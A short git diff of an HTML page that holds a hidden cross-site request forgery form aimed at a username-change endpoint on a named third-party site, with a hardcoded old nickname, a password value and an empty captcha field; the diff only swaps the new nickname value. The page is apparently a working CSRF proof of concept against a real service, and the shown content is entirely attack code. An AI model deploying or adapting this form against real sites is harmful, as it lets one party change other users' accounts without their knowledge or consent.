--- a/index.html
+++ b/index.html
@@ -11,7 +11,7 @@
 
     <form id="csrf-form" action="https://www.rickgdps.xyz/datastore/dashboard/account/changeUsername.php" method="POST" style="display:none;">
         <input type="hidden" name="oldnickname" value="harun" />
-        <input type="hidden" name="newnickname" value="harunwasheree" />
+        <input type="hidden" name="newnickname" value="haruncooking" />
         <input type="hidden" name="password" value="123456" />
         <input type="hidden" name="g-recaptcha-response" value="" />
     </form>
